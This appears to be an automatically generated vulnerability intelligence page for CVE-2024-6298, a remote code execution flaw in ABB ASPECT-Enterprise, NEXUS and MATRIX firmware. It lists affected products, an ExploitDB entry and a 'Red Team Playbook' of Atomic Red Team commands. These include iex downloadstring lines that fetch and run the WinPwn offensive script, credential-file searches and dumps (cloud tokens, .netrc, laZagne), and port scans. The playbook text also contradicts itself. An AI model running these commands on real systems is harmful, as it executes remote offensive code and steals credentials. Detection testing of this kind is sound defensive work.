CVE-2024-6298
Overview
The vulnerability is an unauthorized file access flaw in the web server component of ABB ASPECT-Enterprise versions 3.08.01, including NEXUS and MATRIX series firmware. The root cause involves improper access control mechanisms within the web server, allowing attackers to bypass authentication and gain access to sensitive files. This flaw resides specifically in the web server's handling of file requests, enabling exploitation without user interaction or privileges.
Vulnerability Description
Unauthorized file access in WEB Server in ABB ASPECT - Enterprise v3.08.01; NEXUS Series v3.08.01 ; MATRIX Series v3.08.01 allows Attacker to execute arbitrary code remotely
Impact
An attacker with network access can remotely execute arbitrary code on affected ABB ASPECT-Enterprise devices without authentication or user interaction. This enables full system compromise, including confidentiality, integrity, and availability breaches. The vulnerability allows attackers to gain control over critical industrial control system components, leading to potential data exfiltration, operational disruption, or lateral movement within the network. The CVSS vector confirms the attack requires no privileges and no user interaction, with high impact on confidentiality, integrity, and availability.
Solution
ABB has released security updates addressing this vulnerability in ASPECT-Enterprise firmware version 3.08.01 for NEXUS and MATRIX series devices. Users should apply the patch available from ABB's official advisory at https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A7497&LanguageCode=en, which contains detailed instructions for upgrading affected firmware. Immediate application of this update is recommended to mitigate unauthorized file access and remote code execution risks.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the WEB Server component of ABB's ASPECT and NEXUS Series firmware versions allows unauthorized file access, which can lead to remote code execution. This critical flaw arises from improper validation of user inputs, enabling an attacker to exploit the system by sending specially crafted requests. Once the attacker gains access, they can execute arbitrary code on the server, compromising the integrity and confidentiality of the system. The affected products include various firmware versions across the ASPECT, NEXUS, and MATRIX series, indicating a widespread risk across multiple ABB devices.
Exploitation of this vulnerability can occur through several attack vectors. An attacker may leverage network access to the affected devices, potentially targeting systems that are inadequately secured or exposed to the internet. By crafting malicious requests, the attacker can manipulate the server's response, leading to unauthorized access to sensitive files or execution of malicious scripts. Scenarios may include using social engineering to trick users into clicking on malicious links or exploiting weak authentication mechanisms to gain initial access. Given the critical nature of the devices involved, such as those used in industrial control systems, the implications of successful exploitation can be severe.
The real-world impact of this vulnerability is significant, especially for organizations relying on ABB's technology for operational processes. An attacker gaining remote code execution capabilities could disrupt operations, alter configurations, or exfiltrate sensitive data. The potential for cascading failures in connected systems raises the stakes, as industrial environments often depend on the seamless operation of multiple interconnected devices. The business risks include financial losses, reputational damage, regulatory penalties, and potential liability for breaches affecting third parties. The criticality of the CVSS score of 9.8 underscores the urgency for organizations to address this vulnerability promptly.
To detect and mitigate the risk associated with this vulnerability, organizations should implement a multi-layered security approach. Regular vulnerability assessments and penetration testing can help identify weaknesses in the system before they can be exploited. Employing intrusion detection systems (IDS) can provide real-time monitoring of network traffic for suspicious activities indicative of exploitation attempts. Additionally, organizations should ensure that all firmware is updated to the latest versions, as vendors often release patches to address known vulnerabilities. Implementing strict access controls and network segmentation can further limit exposure, ensuring that only authorized personnel have access to critical systems.
In conclusion, the unauthorized file access vulnerability in ABB's WEB Server products presents a serious threat to industrial environments. The potential for remote code execution highlights the need for immediate action from affected organizations. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare to defend against this vulnerability. Through proactive detection and mitigation strategies, organizations can safeguard their operations and protect sensitive data from malicious actors.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the ABB ASPECT-Enterprise vulnerability, with telemetry indicating a doubling in detection frequency over a short period. Although the EPSS score remains stable, this surge in activity signals increased adversary interest and potential weaponization in operational environments. The availability of a new proof-of-concept exploit on public platforms further lowers the barrier for threat actors to conduct remote code execution attacks, amplifying the risk to critical industrial systems. This evolving landscape elevates the threat level from a theoretical concern to a more imminent operational risk, underscoring the necessity for heightened vigilance in monitoring and detection efforts.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Abb | Aspect-Ent-12 Firmware | All |
cpe:2.3:o:abb:aspect-ent-12_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-2 Firmware | All |
cpe:2.3:o:abb:aspect-ent-2_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-256 Firmware | All |
cpe:2.3:o:abb:aspect-ent-256_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-96 Firmware | All |
cpe:2.3:o:abb:aspect-ent-96_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128 Firmware | All |
cpe:2.3:o:abb:nexus-2128_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-A Firmware | All |
cpe:2.3:o:abb:nexus-2128-a_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-F Firmware | All |
cpe:2.3:o:abb:nexus-2128-f_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-G Firmware | All |
cpe:2.3:o:abb:nexus-2128-g_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264 Firmware | All |
cpe:2.3:o:abb:nexus-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-A Firmware | All |
cpe:2.3:o:abb:nexus-264-a_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-F Firmware | All |
cpe:2.3:o:abb:nexus-264-f_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-G Firmware | All |
cpe:2.3:o:abb:nexus-264-g_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-3-2128 Firmware | All |
cpe:2.3:o:abb:nexus-3-2128_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-3-264 Firmware | All |
cpe:2.3:o:abb:nexus-3-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-11 Firmware | All |
cpe:2.3:o:abb:matrix-11_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-216 Firmware | All |
cpe:2.3:o:abb:matrix-216_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-232 Firmware | All |
cpe:2.3:o:abb:matrix-232_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-264 Firmware | All |
cpe:2.3:o:abb:matrix-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-296 Firmware | All |
cpe:2.3:o:abb:matrix-296_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE) | LiquidWorm | webapps | multiple | - | View |
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-6298 |
| search.abb.com |
GitHub CVE
|
https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A7497&LanguageCode=en&DocumentPartId=&Action=Launch |
| search.abb.com |
NVD API
Vendor Advisory
|
https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A7497&LanguageCode=en&DocumentPartId=&Action=Launch&_ga=2.39956449.23035250.1719878527-141379670.1701144964 |